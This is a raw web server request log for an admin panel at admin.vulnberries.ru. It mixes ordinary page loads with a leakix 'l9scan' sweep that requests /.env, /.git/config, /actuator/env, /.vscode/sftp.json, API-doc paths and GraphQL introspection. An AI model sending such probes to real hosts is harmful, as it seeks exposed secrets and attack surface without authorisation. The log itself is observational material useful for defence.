Path: /static/goods.js
URL: /static/goods.js
Method: GET
[2026-04-08 14:34:50] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Accept: */*;q=0.8
X-Forwarded-For: 103.4.250.158
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-04-08 14:34:50] === HTTP Request ===
===================
X-Forwarded-For: 103.4.250.158
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept: */*;q=0.8
X-Forwarded-Proto: https
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-04-08 14:34:50] === HTTP Request ===
===================
X-Forwarded-For: 103.4.250.158
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49872
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-08 14:34:49] === HTTP Request ===
[2026-04-08 14:34:48] Salary page accessed - IP: 172.30.0.12:49872
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 103.4.250.158
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49872
Path: /salary
URL: /salary
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
===================
X-Forwarded-For: 103.4.250.158
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Accept: */*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49872
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:48] Login page accessed - IP: 172.30.0.12:49872
===================
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 103.4.250.158
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49872
Path: /login
URL: /login
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:48] Logs page accessed - IP: 172.30.0.12:41704
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
X-Forwarded-For: 103.4.250.158
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /logs
URL: /logs
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:48] Goods page accessed - IP: 172.30.0.12:41704
===================
X-Forwarded-Proto: https
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 103.4.250.158
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /goods
URL: /goods
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:48] Defects page accessed - IP: 172.30.0.12:41704
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 103.4.250.158
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /defects
URL: /defects
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:48] Cabinet page accessed - user_id: , IP: 172.30.0.12:41704
===================
X-Forwarded-For: 103.4.250.158
Via: 1.1 Caddy
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /cabinet
URL: /cabinet
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 103.4.250.158
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /https:/fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap
URL: /https%3A/fonts.googleapis.com/css2%3Ffamily%3DInter%3Awght%40400%3B500%3B600%3B700%26display%3Dswap
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:48] Main page accessed - IP: 172.30.0.12:41704
===================
Via: 1.1 Caddy
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-For: 103.4.250.158
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /
URL: /
Method: GET
[2026-04-08 14:34:48] === HTTP Request ===
[2026-04-08 14:34:34] Main page accessed - IP: 172.30.0.12:41704
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 103.4.250.158
Accept-Language: en-US,en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /
URL: /
Method: GET
[2026-04-08 14:34:34] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Query: panel=config
Path: /debug/default/view
URL: /debug/default/view?panel=config
Method: GET
[2026-04-08 14:34:31] === HTTP Request ===
[2026-04-08 14:34:30] Main page accessed - IP: 172.30.0.12:41704
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Query: rest_route=/wp/v2/users/
Path: /
URL: /?rest_route=/wp/v2/users/
Method: GET
[2026-04-08 14:34:30] === HTTP Request ===
[2026-04-08 14:34:29] Main page accessed - IP: 172.30.0.12:41704
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /
URL: /
Method: OPTIONS
[2026-04-08 14:34:29] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /.vscode/sftp.json
URL: /.vscode/sftp.json
Method: GET
[2026-04-08 14:34:28] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /@vite/env
URL: /@vite/env
Method: GET
[2026-04-08 14:34:27] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /trace.axd
URL: /trace.axd
Method: GET
[2026-04-08 14:34:26] === HTTP Request ===
===================
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /api/swagger.json
URL: /api/swagger.json
Method: GET
[2026-04-08 14:34:25] === HTTP Request ===
===================
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /api-docs/swagger.json
URL: /api-docs/swagger.json
Method: GET
[2026-04-08 14:34:24] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /v3/api-docs
URL: /v3/api-docs
Method: GET
[2026-04-08 14:34:23] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /v2/api-docs
URL: /v2/api-docs
Method: GET
[2026-04-08 14:34:22] === HTTP Request ===
===================
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /swagger/v1/swagger.json
URL: /swagger/v1/swagger.json
Method: GET
[2026-04-08 14:34:21] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /swagger.json
URL: /swagger.json
Method: GET
[2026-04-08 14:34:20] === HTTP Request ===
[2026-04-08 14:34:20] Main page accessed - IP: 172.30.0.12:41704
===================
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-For: 103.4.250.158
Sec-Ch-Ua: Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /
URL: /
Method: GET
[2026-04-08 14:34:20] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /webjars/swagger-ui/index.html
URL: /webjars/swagger-ui/index.html
Method: GET
[2026-04-08 14:34:19] === HTTP Request ===
===================
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /swagger/swagger-ui.html
URL: /swagger/swagger-ui.html
Method: GET
[2026-04-08 14:34:18] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /swagger/index.html
URL: /swagger/index.html
Method: GET
[2026-04-08 14:34:17] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: text/html,application/json
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /swagger-ui.html
URL: /swagger-ui.html
Method: GET
[2026-04-08 14:34:16] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /actuator/env
URL: /actuator/env
Method: GET
[2026-04-08 14:34:14] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-04-08 14:34:13] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /info.php
URL: /info.php
Method: GET
[2026-04-08 14:34:12] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /telescope/requests
URL: /telescope/requests
Method: GET
[2026-04-08 14:34:12] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /config.json
URL: /config.json
Method: GET
[2026-04-08 14:34:10] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /s/8333e2139313e2334313e25393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
URL: /s/8333e2139313e2334313e25393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
Method: GET
[2026-04-08 14:34:09] === HTTP Request ===
===================
Body: {"query":"query IntrospectionQuery{__schema{queryType{name} types{name} directives{name}}}"}
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Content-Type: application/json
X-Forwarded-Proto: https
Content-Length: 92
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: application/json
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /api/gql
URL: /api/gql
Method: POST
[2026-04-08 14:34:09] === HTTP Request ===
===================
Body: {"query":"query IntrospectionQuery{__schema{queryType{name} types{name} directives{name}}}"}
X-Forwarded-Proto: https
Via: 1.1 Caddy
Content-Type: application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Accept-Encoding: gzip
Accept: application/json
Content-Length: 92
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /graphql/api
URL: /graphql/api
Method: POST
[2026-04-08 14:34:08] === HTTP Request ===
===================
Body: {"query":"query IntrospectionQuery{__schema{queryType{name} types{name} directives{name}}}"}
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Content-Length: 92
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /api/graphql
URL: /api/graphql
Method: POST
[2026-04-08 14:34:08] === HTTP Request ===
===================
Body: {"query":"query IntrospectionQuery{__schema{queryType{name} types{name} directives{name}}}"}
Accept-Encoding: gzip
Accept: application/json
Content-Length: 92
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
X-Forwarded-Proto: https
Via: 1.1 Caddy
Content-Type: application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /api
URL: /api
Method: POST
[2026-04-08 14:34:08] === HTTP Request ===
===================
Body: {"query":"query IntrospectionQuery{__schema{queryType{name} types{name} directives{name}}}"}
X-Forwarded-Proto: https
Content-Type: application/json
Accept-Encoding: gzip
Accept: application/json
Content-Length: 92
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /graphql
URL: /graphql
Method: POST
[2026-04-08 14:34:07] === HTTP Request ===
===================
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /.git/config
URL: /.git/config
Method: GET
[2026-04-08 14:34:06] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
URL: /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
Method: GET
[2026-04-08 14:34:04] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /.env
URL: /.env
Method: GET
[2026-04-08 14:34:02] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /.DS_Store
URL: /.DS_Store
Method: GET
[2026-04-08 14:34:01] === HTTP Request ===
===================
Accept: application/json
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /v2/_catalog
URL: /v2/_catalog
Method: GET
[2026-04-08 14:34:01] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /login.action
URL: /login.action
Method: GET
[2026-04-08 14:34:00] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
